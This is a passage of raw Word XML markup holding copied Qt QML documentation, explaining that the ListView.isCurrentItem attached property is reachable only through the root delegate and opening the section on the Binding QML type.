          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, below is a modified version of the earlier example involving attached properties. This time, the delegate is an</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2793" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and the colored</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2794" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is a child of that item:</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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import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QtQuick</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ListView</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240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320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model</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3</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delegate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Item</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30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30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color</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ListView</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isCurrentItem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"red"</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"yellow"</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 WRONG! This won't work.</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C10CB8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00C10CB8"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10CB8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00C10CB8"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C10CB8">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3C6BC4">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This does not work as expected because</w:t>
      </w:r>
      <w:r w:rsidRPr="003C6BC4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003C6BC4">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ListView.isCurrentItem</w:t>
      </w:r>
      <w:r w:rsidRPr="003C6BC4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003C6BC4">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is attached</w:t>
      </w:r>
      <w:r w:rsidRPr="003C6BC4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003C6BC4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>only</w:t>
      </w:r>
      <w:r w:rsidRPr="003C6BC4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003C6BC4">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to the root delegate object, and not its children</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Since the</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2795" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is a child of the delegate, rather than being the delegate itself, it cannot access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isCurrentItem</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attached property as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ListView.isCurrentItem</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. So instead, the rectangle should access</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isCurrentItem</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>through the root delegate:</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ListView</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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="55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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>delegate</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Item</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id</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delegateItem</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30</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</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width</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100</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height</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w: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lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00064AC7" w:rsidRDefault="00EA1A01" w:rsidP="00EA1A01">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:spacing w:after="120"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>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064AC7">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>color</w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> delegateItem</w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ListView</w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">isCurrentItem </w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"red"</w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"yellow"</w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// correct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A1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w: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HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:spacing w:after="120"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00EA1A01">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Now</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delegateItem.ListView.isCurrentItem</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>correctly refers to the</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>isCurrentItem</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attached property of the delegate.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRDefault="00490E7E" w:rsidP="00D77D11">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2796" w:anchor="details" w:history="1">
        <w:r w:rsidR="00EE046D" w:rsidRPr="008F7E48">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qml-qtqml-binding.html#details</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00EE046D" w:rsidRPr="00AD6A27" w:rsidRDefault="00EE046D" w:rsidP="00AD6A27">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2556" w:name="_Toc483001088"/>
      <w:bookmarkStart w:id="2557" w:name="_Toc483004057"/>
      <w:bookmarkStart w:id="2558" w:name="_Toc483604423"/>
      <w:bookmarkStart w:id="2559" w:name="_Toc483605643"/>
      <w:r w:rsidRPr="00AD6A27">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Binding QML Type</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2556"/>
      <w:bookmarkEnd w:id="2557"/>
      <w:bookmarkEnd w:id="2558"/>
      <w:bookmarkEnd w:id="2559"/>
    </w:p>
    <w:p w:rsidR="00EE046D" w:rsidRPr="00EE046D" w:rsidRDefault="00EE046D" w:rsidP="00EE046D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enables the arbitrary creation of property bindings.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE046D" w:rsidRPr="00EE046D" w:rsidRDefault="00EE046D" w:rsidP="00EE046D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In QML, property bindings result in a dependency between the properties of different objects.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE046D" w:rsidRPr="00EE046D" w:rsidRDefault="00EE046D" w:rsidP="00AD6A27">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2560" w:name="_Toc483001089"/>
      <w:bookmarkStart w:id="2561" w:name="_Toc483004058"/>
      <w:bookmarkStart w:id="2562" w:name="_Toc483604424"/>
      <w:bookmarkStart w:id="2563" w:name="_Toc483605644"/>
      <w:r w:rsidRPr="00AD6A27">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
